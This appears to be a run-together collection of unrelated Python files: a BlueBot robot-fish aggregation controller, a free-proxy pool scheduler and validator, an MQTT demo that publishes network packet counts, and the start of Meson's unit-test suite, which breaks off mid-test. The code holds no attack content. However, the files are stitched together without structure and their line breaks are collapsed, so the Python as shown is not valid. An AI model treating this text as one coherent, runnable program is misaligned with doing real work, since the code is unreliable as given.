"""Makes BlueBot aggregate. """ import RPi.GPIO as GPIO GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) import os import time import threading import numpy as np from math import * from picamera import PiCamera from lib_utils import * from lib_photodiode import Photodiode from lib_depthsensor import DepthSensor from lib_fin import Fin from lib_leds import LEDS from lib_vision import Vision os.makedirs('./data/{}/'.format(U_FILENAME)) ''' from PIL import Image os.makedirs('./data/{}/'.format(U_FILENAME)) os.makedirs('./data/{}/imgs_r'.format(U_FILENAME)) os.makedirs('./data/{}/imgs_l'.format(U_FILENAME)) ''' def initialize(): """Initializes all threads which are running fins and a logger instance for the overall status """ threading.Thread(target=caudal.run).start() threading.Thread(target=dorsal.run).start() threading.Thread(target=pecto_l.run).start() threading.Thread(target=pecto_r.run).start() leds.on() time.sleep(1) leds.off() def idle(): """Waiting for starting signal """ thresh_photodiode = 40 # lights off: 2, lights on: 400 -> better range! while photodiode.brightness > thresh_photodiode: photodiode.update() time.sleep(3) t_blink = time.time() for blink in range(U_UUID): leds.on() time.sleep(0.2) leds.off() time.sleep(0.2) elapsed_time = time.time() - t_blink sleep_time = 10 - elapsed_time time.sleep(sleep_time) def terminate(): """Terminates all threads which are running fins """ caudal.terminate() dorsal.terminate() pecto_l.terminate() pecto_r.terminate() leds.on() time.sleep(1) leds.off() GPIO.cleanup() def log_status(t_passed, depth_mm): """Logs the overall status of BlueBot """ with open('./data/{}/{}_status.log'.format(U_FILENAME, U_UUID), 'a') as f: f.write('{:.2f},{}\n'.format(t_passed, depth_mm)) def depth_ctrl_from_cam(target): """Controls the diving depth to stay level with an observed object using both cameras. Swithes to depth sensor based depth control when on level with object. The "pitch" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(p^2 + q^2)). A positive angle switches the dorsal fin on to move down. A negative angles switches the dorsal fin off to move up. Returns: (): Floats to the surface if no object observed """ if not target.size: dorsal.off() return pitch_range = 2 # abs(pitch) below which dorsal fin is not controlled pitch = np.arctan2(target[2], sqrt(target[0]**2 + target[1]**2)) * 180 / pi if pitch > pitch_range: dorsal.on() elif pitch < -pitch_range: dorsal.off() def center(sign): right = vision.pqr_r left = vision.pqr_l # compute center if right.size and left.size: center = sign/(right.shape[1] + left.shape[1]) * (np.sum(right, axis=1) + np.sum(left, axis=1)) return center elif right.size: center = sign/right.shape[1] * np.sum(right, axis=1) return center elif left.size: center = sign/left.shape[1] * np.sum(left, axis=1) return center else: return np.zeros(0) def home(target): """Controls the pectoral fins to follow an object using both cameras The "heading" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(q^2 + p^2)). A positive angle switches the pectoral left fin on turn clockwise. A negative angles switches the pectoral right fin on to turn counterclockwise. Returns: (): Floats to the surface and turns on the spot if no object observed """ caudal_range = 50 # abs(heading) below which caudal fin is switched on # blob behind or lost if not target.size: #print('cant see blob') pecto_r.set_frequency(6) pecto_r.on() pecto_l.off() caudal.off() return # calculate heading heading = np.arctan2(target[1], target[0]) * 180 / pi # target to the right if heading > 0: freq_l = 5 + 5 * abs(heading) / 180 pecto_l.set_frequency(freq_l) #print('turn cw') pecto_l.on() pecto_r.off() if heading < caudal_range: caudal.on() else: caudal.off() # target to the left elif heading < 0: freq_r = 5 + 5 * abs(heading) / 180 pecto_r.set_frequency(freq_r) #print('turn ccw') pecto_r.on() pecto_l.off() if heading > -caudal_range: caudal.on() else: caudal.off() def main(run_time=60): iteration = 0 t_start = time.time() while time.time() - t_start < run_time: try: vision.update() except: continue ''' # SAVE IMAGES temp = Image.fromarray(vision._cam_r.img) temp.save('./data/{}/imgs_r/img_r_{}.png'.format(U_FILENAME,iteration)) temp = Image.fromarray(vision._cam_l.img) temp.save('./data/{}/imgs_l/img_l_{}.png'.format(U_FILENAME,iteration)) iteration += 1 ''' time_passed = time.time() - t_start if (time_passed < run_time/4) or (1/2*run_time <= time_passed < 3/4*run_time): sign = -1 else: sign = 1 target = center(sign) home(target) depth_ctrl_from_cam(target) depth_sensor.update() depth_mm = max(0, (depth_sensor.pressure_mbar - surface_pressure) * 10.197162129779) log_status(time_passed, depth_mm) max_centroids = 3 # maximum expected centroids in environment caudal = Fin(U_FIN_C1, U_FIN_C2, 3) # freq, [Hz] dorsal = Fin(U_FIN_D1, U_FIN_D2, 5) # freq, [Hz] pecto_r = Fin(U_FIN_PR1, U_FIN_PR2, 8) # freq, [Hz] pecto_l = Fin(U_FIN_PL1, U_FIN_PL2, 8) # freq, [Hz] photodiode = Photodiode() leds = LEDS() vision = Vision(max_centroids, True) vision._cam_r.colorbot_settings() vision._cam_l.colorbot_settings() depth_sensor = DepthSensor() depth_sensor.update() surface_pressure = depth_sensor.pressure_mbar initialize() idle() main(80) # run time terminate()
schedule.py
import time from multiprocessing import Process import asyncio import aiohttp try: from aiohttp.errors import ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError except: from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError from proxypool.db import RedisClient from proxypool.error import ResourceDepletionError from proxypool.getter import FreeProxyGetter from proxypool.setting import * from asyncio import TimeoutError class ValidityTester(object): test_api = TEST_API def __init__(self): self._raw_proxies = None self._usable_proxies = [] def set_raw_proxies(self, proxies): self._raw_proxies = proxies self._conn = RedisClient() async def test_single_proxy(self, proxy): """ text one proxy, if valid, put them to usable_proxies. """ try: async with aiohttp.ClientSession() as session: try: if isinstance(proxy, bytes): proxy = proxy.decode('utf-8') real_proxy = 'http://' + proxy print('Testing', proxy) async with session.get(self.test_api, proxy=real_proxy, timeout=get_proxy_timeout) as response: if response.status == 200: self._conn.put(proxy) print('Valid proxy', proxy) except (ProxyConnectionError, TimeoutError, ValueError): print('Invalid proxy', proxy) except (ServerDisconnectedError, ClientResponseError,ClientConnectorError) as s: print(s) pass def test(self): """ aio test all proxies. """ print('ValidityTester is working') try: loop = asyncio.get_event_loop() tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies] loop.run_until_complete(asyncio.wait(tasks)) except ValueError: print('Async Error') class PoolAdder(object): """ add proxy to pool """ def __init__(self, threshold): self._threshold = threshold self._conn = RedisClient() self._tester = ValidityTester() self._crawler = FreeProxyGetter() def is_over_threshold(self): """ judge if count is overflow. """ if self._conn.queue_len >= self._threshold: return True else: return False def add_to_queue(self): print('PoolAdder is working') proxy_count = 0 while not self.is_over_threshold(): for callback_label in range(self._crawler.__CrawlFuncCount__): callback = self._crawler.__CrawlFunc__[callback_label] raw_proxies = self._crawler.get_raw_proxies(callback) # test crawled proxies self._tester.set_raw_proxies(raw_proxies) self._tester.test() proxy_count += len(raw_proxies) if self.is_over_threshold(): print('IP is enough, waiting to be used') break if proxy_count == 0: raise ResourceDepletionError class Schedule(object): @staticmethod def valid_proxy(cycle=VALID_CHECK_CYCLE): """ Get half of proxies which in redis """ conn = RedisClient() tester = ValidityTester() while True: print('Refreshing ip') count = int(0.5 * conn.queue_len) if count == 0: print('Waiting for adding') time.sleep(cycle) continue raw_proxies = conn.get(count) tester.set_raw_proxies(raw_proxies) tester.test() time.sleep(cycle) @staticmethod def check_pool(lower_threshold=POOL_LOWER_THRESHOLD, upper_threshold=POOL_UPPER_THRESHOLD, cycle=POOL_LEN_CHECK_CYCLE): """ If the number of proxies less than lower_threshold, add proxy """ conn = RedisClient() adder = PoolAdder(upper_threshold) while True: if conn.queue_len < lower_threshold: adder.add_to_queue() time.sleep(cycle) def run(self): print('Ip processing running') valid_process = Process(target=Schedule.valid_proxy) check_process = Process(target=Schedule.check_pool) valid_process.start() check_process.start()
main.py
#!/usr/bin/python import paho.mqtt.client as paho import psutil import signal import sys import time from threading import Thread def interruptHandler(signal, frame): sys.exit(0) def on_publish(mosq, obj, msg): pass def dataNetwork(): netdata = psutil.net_io_counters() return netdata.packets_sent + netdata.packets_recv def dataNetworkHandler(): idDevice = "90:b6:86:05:e7:d1" mqttclient = paho.Client() mqttclient.on_publish = on_publish mqttclient.connect("test.mosquitto.org", 1883, 60) while True: packets = dataNetwork() message = idDevice + " " + str(packets) print "MQTT dataNetworkHandler " + message mqttclient.publish("IoT101/Network", message) time.sleep(1) if __name__ == '__main__': signal.signal(signal.SIGINT, interruptHandler) threadx = Thread(target=dataNetworkHandler) threadx.start() while True: print "Richo Hello Internet of Things 101" time.sleep(5) # End of File
run_unittests.py
#!/usr/bin/env python3 # Copyright 2016-2017 The Meson development team # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import time import stat import subprocess import re import json import tempfile import textwrap import os import shutil import sys import unittest import platform import pickle import functools import io import operator import threading import zipfile import hashlib from itertools import chain from unittest import mock from configparser import ConfigParser from contextlib import contextmanager from glob import glob from pathlib import (PurePath, Path) from distutils.dir_util import copy_tree import typing as T import mesonbuild.mlog import mesonbuild.depfile import mesonbuild.dependencies.base import mesonbuild.compilers import mesonbuild.envconfig import mesonbuild.environment import mesonbuild.mesonlib import mesonbuild.coredata import mesonbuild.modules.gnome from mesonbuild.interpreter import Interpreter, ObjectHolder from mesonbuild.ast import AstInterpreter from mesonbuild.mesonlib import ( BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows, is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos, windows_proof_rmtree, python_command, version_compare, split_args, quote_arg, relpath, is_linux, git, GIT ) from mesonbuild.environment import detect_ninja from mesonbuild.mesonlib import MesonException, EnvironmentException, OptionKey from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram import mesonbuild.dependencies.base from mesonbuild.build import Target, ConfigurationData import mesonbuild.modules.pkgconfig from mesonbuild.mtest import TAPParser, TestResult from mesonbuild.wrap.wrap import PackageDefinition, WrapException from run_tests import ( Backend, FakeBuild, FakeCompilerOptions, ensure_backend_detects_changes, exe_suffix, get_backend_commands, get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script, run_configure_inprocess, run_mtest_inprocess ) if T.TYPE_CHECKING: from mesonbuild.compilers import Compiler URLOPEN_TIMEOUT = 5 @contextmanager def chdir(path: str): curdir = os.getcwd() os.chdir(path) try: yield finally: os.chdir(curdir) def get_dynamic_section_entry(fname: str, entry: str) -> T.Optional[str]: if is_cygwin() or is_osx(): raise unittest.SkipTest('Test only applicable to ELF platforms') try: raw_out = subprocess.check_output(['readelf', '-d', fname], universal_newlines=True) except FileNotFoundError: # FIXME: Try using depfixer.py:Elf() as a fallback raise unittest.SkipTest('readelf not found') pattern = re.compile(entry + r': \[(.*?)\]') for line in raw_out.split('\n'): m = pattern.search(line) if m is not None: return str(m.group(1)) return None # The file did not contain the specified entry. def get_soname(fname: str) -> T.Optional[str]: return get_dynamic_section_entry(fname, 'soname') def get_rpath(fname: str) -> T.Optional[str]: raw = get_dynamic_section_entry(fname, r'(?:rpath|runpath)') # Get both '' and None here if not raw: return None # nix/nixos adds a bunch of stuff to the rpath out of necessity that we # don't check for, so clear those final = ':'.join([e for e in raw.split(':') if not e.startswith('/nix')]) return final def is_tarball(): if not os.path.isdir('docs'): return True return False def is_ci(): if 'CI' in os.environ: return True return False def _git_init(project_dir): # If a user has git configuration init.defaultBranch set we want to override that with tempfile.TemporaryDirectory() as d: out = git(['--version'], str(d))[1] if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'): extra_cmd = ['--initial-branch', 'master'] else: extra_cmd = [] subprocess.check_call(['git', 'init'] + extra_cmd, cwd=project_dir, stdout=subprocess.DEVNULL) subprocess.check_call(['git', 'config', 'user.name', 'Author Person'], cwd=project_dir) subprocess.check_call(['git', 'config', 'user.email', 'teh_coderz@example.com'], cwd=project_dir) subprocess.check_call('git add *', cwd=project_dir, shell=True, stdout=subprocess.DEVNULL) subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir, stdout=subprocess.DEVNULL) @functools.lru_cache() def is_real_gnu_compiler(path): ''' Check if the gcc we have is a real gcc and not a macOS wrapper around clang ''' if not path: return False out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT) return 'Free Software Foundation' in out def skipIfNoExecutable(exename): ''' Skip this test if the given executable is not found. ''' def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): if shutil.which(exename) is None: raise unittest.SkipTest(exename + ' not found') return func(*args, **kwargs) return wrapped return wrapper def skipIfNoPkgconfig(f): ''' Skip this test if no pkg-config is found, unless we're on CI. This allows users to run our test suite without having pkg-config installed on, f.ex., macOS, while ensuring that our CI does not silently skip the test because of misconfiguration. Note: Yes, we provide pkg-config even while running Windows CI ''' @functools.wraps(f) def wrapped(*args, **kwargs): if not is_ci() and shutil.which('pkg-config') is None: raise unittest.SkipTest('pkg-config not found') return f(*args, **kwargs) return wrapped def skipIfNoPkgconfigDep(depname): ''' Skip this test if the given pkg-config dep is not found, unless we're on CI. ''' def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): if not is_ci() and shutil.which('pkg-config') is None: raise unittest.SkipTest('pkg-config not found') if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0: raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname)) return func(*args, **kwargs) return wrapped return wrapper def skip_if_no_cmake(f): ''' Skip this test if no cmake is found, unless we're on CI. This allows users to run our test suite without having cmake installed on, f.ex., macOS, while ensuring that our CI does not silently skip the test because of misconfiguration. ''' @functools.wraps(f) def wrapped(*args, **kwargs): if not is_ci() and shutil.which('cmake') is None: raise unittest.SkipTest('cmake not found') return f(*args, **kwargs) return wrapped def skip_if_not_language(lang): def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): try: env = get_fake_env() f = getattr(env, 'detect_{}_compiler'.format(lang)) f(MachineChoice.HOST) except EnvironmentException: raise unittest.SkipTest('No {} compiler found.'.format(lang)) return func(*args, **kwargs) return wrapped return wrapper def skip_if_env_set(key): ''' Skip a test if a particular env is set, except when running under CI ''' def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): old = None if key in os.environ: if not is_ci(): raise unittest.SkipTest('Env var {!r} set, skipping'.format(key)) old = os.environ.pop(key) try: return func(*args, **kwargs) finally: if old is not None: os.environ[key] = old return wrapped return wrapper def skip_if_not_base_option(feature): """Skip tests if The compiler does not support a given base option. for example, ICC doesn't currently support b_sanitize. """ def actual(f): @functools.wraps(f) def wrapped(*args, **kwargs): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) key = OptionKey(feature) if key not in cc.base_options: raise unittest.SkipTest( '{} not available with {}'.format(feature, cc.id)) return f(*args, **kwargs) return wrapped return actual @contextmanager def temp_filename(): '''A context manager which provides a filename to an empty temporary file. On exit the file will be deleted. ''' fd, filename = tempfile.mkstemp() os.close(fd) try: yield filename finally: try: os.remove(filename) except OSError: pass @contextmanager def no_pkgconfig(): ''' A context manager that overrides shutil.which and ExternalProgram to force them to return None for pkg-config to simulate it not existing. ''' old_which = shutil.which old_search = ExternalProgram._search def new_search(self, name, search_dir): if name == 'pkg-config': return [None] return old_search(self, name, search_dir) def new_which(cmd, *kwargs): if cmd == 'pkg-config': return None return old_which(cmd, *kwargs) shutil.which = new_which ExternalProgram._search = new_search try: yield finally: shutil.which = old_which ExternalProgram._search = old_search class InternalTests(unittest.TestCase): def test_version_number(self): searchfunc = mesonbuild.environment.search_version self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3') self.assertEqual(searchfunc('1.2.3'), '1.2.3') self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3') self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128') self.assertEqual(searchfunc('2016.10.128'), '2016.10.128') self.assertEqual(searchfunc('2016.10'), '2016.10') self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3') self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.x'), 'unknown version') def test_mode_symbolic_to_bits(self): modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits self.assertEqual(modefunc('---------'), 0) self.assertEqual(modefunc('r--------'), stat.S_IRUSR) self.assertEqual(modefunc('---r-----'), stat.S_IRGRP) self.assertEqual(modefunc('------r--'), stat.S_IROTH) self.assertEqual(modefunc('-w-------'), stat.S_IWUSR) self.assertEqual(modefunc('----w----'), stat.S_IWGRP) self.assertEqual(modefunc('-------w-'), stat.S_IWOTH) self.assertEqual(modefunc('--x------'), stat.S_IXUSR) self.assertEqual(modefunc('-----x---'), stat.S_IXGRP) self.assertEqual(modefunc('--------x'), stat.S_IXOTH) self.assertEqual(modefunc('--S------'), stat.S_ISUID) self.assertEqual(modefunc('-----S---'), stat.S_ISGID) self.assertEqual(modefunc('--------T'), stat.S_ISVTX) self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR) self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP) self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH) self.assertEqual(modefunc('rwx------'), stat.S_IRWXU) self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG) self.assertEqual(modefunc('------rwx'), stat.S_IRWXO) # We could keep listing combinations exhaustively but that seems # tedious and pointless. Just test a few more. self.assertEqual(modefunc('rwxr-xr-x'), stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH) self.assertEqual(modefunc('rw-r--r--'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH) self.assertEqual(modefunc('rwsr-x---'), stat.S_IRWXU | stat.S_ISUID | stat.S_IRGRP | stat.S_IXGRP) def test_compiler_args_class_none_flush(self): cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock()) a = cc.compiler_args(['-I.']) #first we are checking if the tree construction deduplicates the correct -I argument a += ['-I..'] a += ['-I./tests/'] a += ['-I./tests2/'] #think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes: # assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.']) a += ['-I.'] a += ['-I.', '-I./tests/'] self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..']) #then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one a += ['-I.', '-I./tests2/'] self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..']) def test_compiler_args_class_d(self): d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch') # check include order is kept when deduplicating a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird']) a += ['-Ifirst'] self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird']) def test_compiler_args_class_clike(self): cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock()) # Test that empty initialization works a = cc.compiler_args() self.assertEqual(a, []) # Test that list initialization works a = cc.compiler_args(['-I.', '-I..']) self.assertEqual(a, ['-I.', '-I..']) # Test that there is no de-dup on initialization self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.']) ## Test that appending works a.append('-I..') self.assertEqual(a, ['-I..', '-I.']) a.append('-O3') self.assertEqual(a, ['-I..', '-I.', '-O3']) ## Test that in-place addition works a += ['-O2', '-O2'] self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2']) # Test that removal works a.remove('-O2') self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2']) # Test that de-dup happens on addition a += ['-Ifoo', '-Ifoo'] self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2']) # .extend() is just +=, so we don't test it ## Test that addition works # Test that adding a list with just one old arg works and yields the same array a = a + ['-Ifoo'] self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2']) # Test that adding a list with one arg new and one old works a = a + ['-Ifoo', '-Ibaz'] self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2']) # Test that adding args that must be prepended and appended works a = a + ['-Ibar', '-Wall'] self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall']) ## Test that reflected addition works # Test that adding to a list with just one old arg works and yields the same array a = ['-Ifoo'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall']) # Test that adding to a list with just one new arg that is not pre-pended works a = ['-Werror'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall']) # Test that adding to a list with two new args preserves the order a = ['-Ldir', '-Lbah'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall']) # Test that adding to a list with old args does nothing a = ['-Ibar', '-Ibaz', '-Ifoo'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall']) ## Test that adding libraries works l = cc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l, ['-Lfoodir', '-lfoo']) # Adding a library and a libpath appends both correctly l += ['-Lbardir', '-lbar'] self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar']) # Adding the same library again does nothing l += ['-lbar'] self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar']) ## Test that 'direct' append and extend works l = cc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l, ['-Lfoodir', '-lfoo']) # Direct-adding a library and a libpath appends both correctly l.extend_direct(['-Lbardir', '-lbar']) self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar']) # Direct-adding the same library again still adds it l.append_direct('-lbar') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar']) # Direct-adding with absolute path deduplicates l.append_direct('/libbaz.a') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a']) # Adding libbaz again does nothing l.append_direct('/libbaz.a') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a']) def test_compiler_args_class_gnuld(self): ## Test --start/end-group linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', []) gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker) ## Ensure that the fake compiler is never called by overriding the relevant function gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include'] ## Test that 'direct' append and extend works l = gcc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group']) # Direct-adding a library and a libpath appends both correctly l.extend_direct(['-Lbardir', '-lbar']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group']) # Direct-adding the same library again still adds it l.append_direct('-lbar') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group']) # Direct-adding with absolute path deduplicates l.append_direct('/libbaz.a') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group']) # Adding libbaz again does nothing l.append_direct('/libbaz.a') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group']) # Adding a non-library argument doesn't include it in the group l += ['-Lfoo', '-Wl,--export-dynamic'] self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic']) # -Wl,-lfoo is detected as a library and gets added to the group l.append('-Wl,-ldl') self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group']) def test_compiler_args_remove_system(self): ## Test --start/end-group linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', []) gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker) ## Ensure that the fake compiler is never called by overriding the relevant function gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include'] ## Test that 'direct' append and extend works l = gcc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group']) ## Test that to_native removes all system includes l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include'] self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1']) def test_string_templates_substitution(self): dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict substfunc = mesonbuild.mesonlib.substitute_values ME = mesonbuild.mesonlib.MesonException # Identity self.assertEqual(dictfunc([], []), {}) # One input, no outputs inputs = ['bar/foo.c.in'] outputs = [] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:]) cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:]) cmd = ['@INPUT@', '@BASENAME@.hah', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:]) cmd = ['@OUTPUT@'] self.assertRaises(ME, substfunc, cmd, d) # One input, one output inputs = ['bar/foo.c.in'] outputs = ['out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c', '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@.out', '@OUTPUT@', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + outputs + cmd[2:]) cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs) cmd = ['@INPUT@', '@BASENAME@.hah', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:]) # One input, one output with a subdir outputs = ['dir/out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c', '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Two inputs, no outputs inputs = ['bar/foo.c.in', 'baz/foo.c.in'] outputs = [] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + cmd[1:]) cmd = ['@INPUT0@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:]) cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:]) cmd = ['@INPUT0@', '@INPUT1@', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + cmd[2:]) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Too many inputs cmd = ['@PLAINNAME@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@BASENAME@'] self.assertRaises(ME, substfunc, cmd, d) # No outputs cmd = ['@OUTPUT@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@OUTPUT0@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@OUTDIR@'] self.assertRaises(ME, substfunc, cmd, d) # Two inputs, one output outputs = ['dir/out.c'] 